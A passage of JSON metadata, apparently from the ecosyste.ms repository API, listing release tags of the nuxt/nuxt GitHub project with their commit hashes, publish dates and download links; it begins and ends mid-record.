pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1